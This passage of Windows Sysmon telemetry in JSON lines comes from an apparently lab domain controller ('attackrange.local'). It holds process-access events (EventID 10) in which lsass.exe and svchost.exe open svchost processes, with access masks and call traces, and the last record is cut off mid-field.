{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1151,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.235\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.235","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1152,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.235\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.235","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1153,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.235\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.235","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1154,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.235\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.235","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1155,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.235\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.235","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1156,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.235\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 92\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01BF-5F25-0000-0010F1980200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.235","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"92","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01BF-5F25-0000-0010F1980200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1157,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:40.360\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:40.360","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1158,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:40.360\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:40.360","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.